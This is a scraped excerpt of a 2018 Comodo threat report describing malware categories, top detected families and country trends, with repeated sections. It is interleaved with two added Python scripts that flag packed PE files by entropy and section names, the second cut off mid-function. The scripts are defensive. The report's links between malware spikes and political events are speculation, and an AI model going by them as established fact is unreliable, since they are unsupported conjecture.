In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application," or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers."

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals," or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot," which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 52 of 73

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
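As an added example that is not from the Comodo report, the following Python script applies the packer signals this section describes to a PE file: it walks the section table without third-party libraries and flags sections that are empty on disk but large in memory, high-entropy sections, writable-and-executable sections, and UPX-style section names. The two PE images it checks are constructed inside the script (assumed minimal, non-runnable binaries) so it runs offline; the entropy threshold of 7.0 is a common rule-of-thumb choice, not a value from the report.

```python
"""Heuristic check for packed PE executables (added example, not Comodo's code).
Walks a PE file's section table and reports the packer signals described above:
a section empty on disk but large in memory (the unpack target), high-entropy
bytes (compressed or encrypted payload), writable+executable sections and UPX-style
names. Sample images are constructed below so it runs offline; a real engine
weighs many more signals than these."""
import math
import random
import struct

# IMAGE_SCN_* section characteristic flags from the PE specification.
SCN_CODE, SCN_IDATA, SCN_UDATA = 0x20, 0x40, 0x80
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}  # extend with other packers' names

def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe_sections(image):
    """Minimal PE walk: DOS header -> e_lfanew -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: NumberOfSections at +2, 12 bytes skipped, SizeOfOptionalHeader at +16
    num_sections, opt_size = struct.unpack_from("<H12xH", image, coff + 2)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        # 40-byte entry: Name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, 12 bytes of relocation/line-number fields, Characteristics
        name, vsize, _vaddr, rsize, rptr, chars = struct.unpack_from(
            "<8sIIII12xI", image, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rsize,
            "entropy": shannon_entropy(image[rptr:rptr + rsize]),
            "executable": bool(chars & SCN_EXEC),
            "writable": bool(chars & SCN_WRITE),
        })
    return sections

def packer_indicators(image, entropy_threshold=7.0):
    """Return the reasons an image looks packed; an empty list means no signal."""
    reasons = []
    for s in parse_pe_sections(image):
        n = s["name"]
        if n in KNOWN_PACKER_SECTIONS:
            reasons.append(f"{n}: known packer section name")
        if s["raw_size"] == 0 and s["virtual_size"] > 0 and s["writable"] and s["executable"]:
            reasons.append(f"{n}: empty on disk, {s['virtual_size']} bytes in memory (unpack target)")
        if s["raw_size"] > 0 and s["entropy"] >= entropy_threshold:
            reasons.append(f"{n}: entropy {s['entropy']:.2f} suggests compressed or encrypted data")
        if s["raw_size"] > 0 and s["executable"] and s["writable"]:
            reasons.append(f"{n}: section is both writable and executable")
    return reasons

def build_sample_pe(sections):
    """Construct a minimal, non-runnable PE image (headers, section table, raw data)
    for offline testing. sections: list of (name, raw_bytes, virtual_size, flags)."""
    e_lfanew, file_align = 0x40, 0x200
    raw_ptr = -(-(e_lfanew + 24 + 40 * len(sections)) // file_align) * file_align
    table, body = bytearray(), bytearray()
    for idx, (name, raw, vsize, flags) in enumerate(sections):
        rptr = raw_ptr + len(body) if raw else 0
        table += struct.pack("<8sIIII12xI", name.encode(), vsize,
                             0x1000 * (idx + 1), len(raw), rptr, flags)
        body += raw
    image = bytearray(b"MZ".ljust(0x3C, b"\0")) + struct.pack("<I", e_lfanew)
    image += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    image += table
    image += b"\0" * (raw_ptr - len(image)) + body
    return bytes(image)

# Constructed samples: a UPX-style layout beside an ordinary two-section binary.
_rng = random.Random(1)
_HIGH_ENTROPY = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for compressed code
PACKED_SAMPLE = build_sample_pe([
    ("UPX0", b"", 0x8000, SCN_UDATA | SCN_EXEC | SCN_READ | SCN_WRITE),
    ("UPX1", _HIGH_ENTROPY, 0x2000, SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE),
    (".rsrc", b"\0" * 512, 0x200, SCN_IDATA | SCN_READ),
])
CLEAN_SAMPLE = build_sample_pe([
    (".text", b"\x55\x8b\xec\x5d\xc3" * 400, 0x800, SCN_CODE | SCN_EXEC | SCN_READ),
    (".data", b"config=value\n" * 50, 0x300, SCN_IDATA | SCN_READ | SCN_WRITE),
])

if __name__ == "__main__":
    for label, sample in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, packer_indicators(sample) or ["no packer indicators"])
```

Point `parse_pe_sections` at the bytes of a real PE to triage a suspicious file; a genuine UPX-packed binary produces the same UPX0/UPX1 pattern the constructed sample does.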

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” them or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application”, or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises, but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED, COMODO SECURITY SOLUTIONS, INC.

VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 53 of 73

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
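As an added example that is not part of the Comodo report, the following Python script applies two of the checks a triage analyst uses to spot a packed PE file of the kind described above: stock UPX section names, and per-section Shannon entropy, since compressed or encrypted payloads sit close to 8 bits per byte while ordinary code does not. The PE images it scans are constructed fixtures built inline, and the 7.0 bits-per-byte threshold is an assumed rule of thumb, not a figure from the report.

```python
"""Added example, not from the Comodo report: a defender-side triage heuristic
for packed PE executables, using only the standard library.  It parses the PE
section table and flags stock UPX section names and high-entropy sections."""
import hashlib
import math
import struct

HIGH_ENTROPY = 7.0                      # assumed triage threshold, bits/byte
MIN_SIZE = 256                          # entropy is noisy on tiny sections
UPX_NAMES = {b"UPX0", b"UPX1", b"UPX2"}  # names left by an unmodified UPX

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(image: bytes):
    """Return [(name, raw_bytes)] from the PE section table (DOS stub pointer, COFF header, 40-byte section headers)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                # first section header
    sections = []
    for i in range(nsections):
        hdr = image[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections

def assess(image: bytes) -> dict:
    """Per-section entropy plus a verdict.  'likely_packed' is set by a UPX section
    name or a large high-entropy section; a missing .text is only a supporting signal."""
    sections = parse_sections(image)
    per_section, findings, packed = {}, [], False
    for name, data in sections:
        label = name.decode("ascii", "replace")
        ent = round(shannon_entropy(data), 2)
        per_section[label] = ent
        if name in UPX_NAMES:
            findings.append(f"{label}: stock UPX section name")
            packed = True
        if len(data) >= MIN_SIZE and ent >= HIGH_ENTROPY:
            findings.append(f"{label}: entropy {ent} >= {HIGH_ENTROPY}")
            packed = True
    if b".text" not in {n for n, _ in sections}:
        findings.append("no .text section (supporting signal)")
    return {"sections": per_section, "findings": findings,
            "likely_packed": packed}

# --- constructed fixtures (not real binaries) ---------------------------------
def build_pe(sections) -> bytes:
    """Minimal, non-runnable PE32 image with the given [(name, payload)] sections,
    file-aligned to 0x200 bytes, so the parser above has something to read."""
    align, opt_size = 0x200, 0xE0
    hdr_end = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // align) * align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
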